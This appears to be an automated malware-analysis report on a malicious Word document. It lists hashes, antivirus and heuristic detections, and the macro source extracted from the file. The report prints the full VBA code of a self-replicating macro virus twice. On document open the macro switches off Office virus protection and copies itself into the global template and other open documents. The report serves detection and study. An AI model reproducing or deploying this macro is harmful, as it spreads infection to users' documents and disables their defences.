Office (OLE) malware analysis — malicious · 1f0b46148f4f8aa9

MALICIOUS

Office (OLE)

68.0 KB Created: 2016-06-23 08:01:00 Authoring application: Microsoft Office Word First seen: 2021-01-15

MD5: 249f7262132882c2481d5332bb7963aa SHA-1: a1eeff9e7ca3b38f356a4c584c5576b99bd9e338 SHA-256: 1f0b46148f4f8aa9437a20ef2d45fbf87a0f693ed85703f620d76f10445326c1

150 Risk Score

Heuristics 5

ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1441 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1441 bytes
SHA-256: `9299e72afe1cfe327ca211179d4256d1d66c64ceec6e639fbb1886a44a31df44`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Close()Open()Close()Open() Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False EnableCancelKey = wdCancelDisabled Set maci = MacroContainer.VBProject.VBComponents.Item(1) Set macic = maci.codemodule ns$ = Left(macic.Lines(1, 1), 21) Set inf = NormalTemplate: nsi$ = ns$ + "Close()" If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()" Set infc = inf.VBProject.VBComponents Set infi = infc.Item(1) Set infic = infi.codemodule infi.Name = "ThisDocument" For mx = 2 To infc.Count infc.Remove infc.Item(2) Next mx If infic.countlines <> macic.countoflines Then infic.deletelines 1, infic.countoflines For coco = 1 To macic.countoflines infic.insertlines coco, macic.Lines(coco, 1) Next coco infic.replaceline 1, nsi$ End If If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName EnableCancelKey = wdCancelDisabled End Sub 'ThisDocument v 1.0 1999

SHA-256: 9299e72afe1cfe327ca211179d4256d1d66c64ceec6e639fbb1886a44a31df44

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Close()Open()Close()Open()
Private Sub Document_Open()
    On Error Resume Next
    Options.VirusProtection = False
    EnableCancelKey = wdCancelDisabled
    Set maci = MacroContainer.VBProject.VBComponents.Item(1)
    Set macic = maci.codemodule
    ns$ = Left(macic.Lines(1, 1), 21)
    Set inf = NormalTemplate: nsi$ = ns$ + "Close()"
        If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()"
    Set infc = inf.VBProject.VBComponents
    Set infi = infc.Item(1)
    Set infic = infi.codemodule
    infi.Name = "ThisDocument"
    For mx = 2 To infc.Count
        infc.Remove infc.Item(2)
    Next mx
        If infic.countlines <> macic.countoflines Then
            infic.deletelines 1, infic.countoflines
            For coco = 1 To macic.countoflines
                infic.insertlines coco, macic.Lines(coco, 1)
            Next coco
            infic.replaceline 1, nsi$
        End If
    If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    EnableCancelKey = wdCancelDisabled
End Sub
'ThisDocument v 1.0 1999

Open this report in the interactive analyzer, or submit your own file for analysis.